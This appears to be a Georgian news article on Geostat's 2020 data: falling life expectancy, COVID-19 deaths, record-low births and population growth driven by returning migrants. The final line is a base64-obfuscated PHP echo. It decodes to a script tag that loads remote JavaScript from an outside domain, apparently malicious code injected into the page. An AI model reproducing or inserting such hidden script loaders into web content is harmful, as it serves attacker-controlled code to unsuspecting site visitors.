celsiusi
ავერსი შნაიდერი
2020 წელს საქართველოში სიცოცხლის მოსალოდნელი ხანგრძლივობა შემცირდა - საქსტატის მიერ გამოქვეყნებული ანგარიშის თანახმად, ქვეყანაში 2020 წელს სიცოცხლის მოსალოდნელი ხანგრძლივობა 0.7 წლით შემცირდა და 73.4 წელი შეადგინა. მათ შორის კაცებისთვის კლება 0.7 წელი იყო და 69.1 წელი გახდა, ქალებისთვისაც კლება იგივეა - 0.7 წელი იყო და 77.7 წელი გახდა.
 
სიცოცხლის მოსალოდნელი ხანგრძლივობის შემცირება COVID-19-ის გამო ქვეყანაში სიკვდილიანობის ზრდამ განაპირობა. გასული წლის განმავლობაში ქვეყანაში გარდაცვლილთა რაოდენობა 8%-ით გაიზარდა, რაც გასული წლების განმავლობაში უპრეცედენტო ზრდას წარმოადენს. 2020 წელს საქართველოში 50,537 ადამიანი გარდაიცვალა, მათ შორის 3,773-ის სიკვდილის პირდაპირი მიზეზი COVID-19 იყო.
 
ამასთან, 2020 წელს საქართველოში შობადობა ბოლო 14 წლის მინიმუმამდე შემცირდა და 46,520 შეადგინა, რის გამოც ქვეყანაში უარყოფითი ბუნებრივი მატება დაფიქსირდა.
 
 
საქსტატის ანგარიშის თანახმად, 2020 წელს საქართველოს მოსახლეობა 0.3%-ით გაიზარდა და 3,728,600 ადამიანი შეადგინა - სტატისტიკიდან, რომ ამ ზრდის მთავარი მიზეზი არა ბუნებრივი მატება, არამედ COVID-19-ის გამო უცხოეთიდან საქართველოს მოქალაქეთა დაბრუნება იყო. 
 
ბუნებრივი მატება 2020 წელს უარყოფითი იყო და მინუს 4,017 შეადგინა, დადებითი მიგრაციული სალდო კი 15,732 იყო, შედეგად მოსახლეობა 0.3%-ით გაიზარდა.
 
2020 წელს, ემიგრანტების რიცხოვნობამ 74,264 შეადგინა, რაც წინა წელთან შედარებით 29.3 პროცენტით ნაკლებია, ხოლო იმიგრანტების რიცხოვნობა 7.1 პროცენტით შემცირდა და 89,996 შეადგინა (სხვაობა 15,732).
 
1221
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");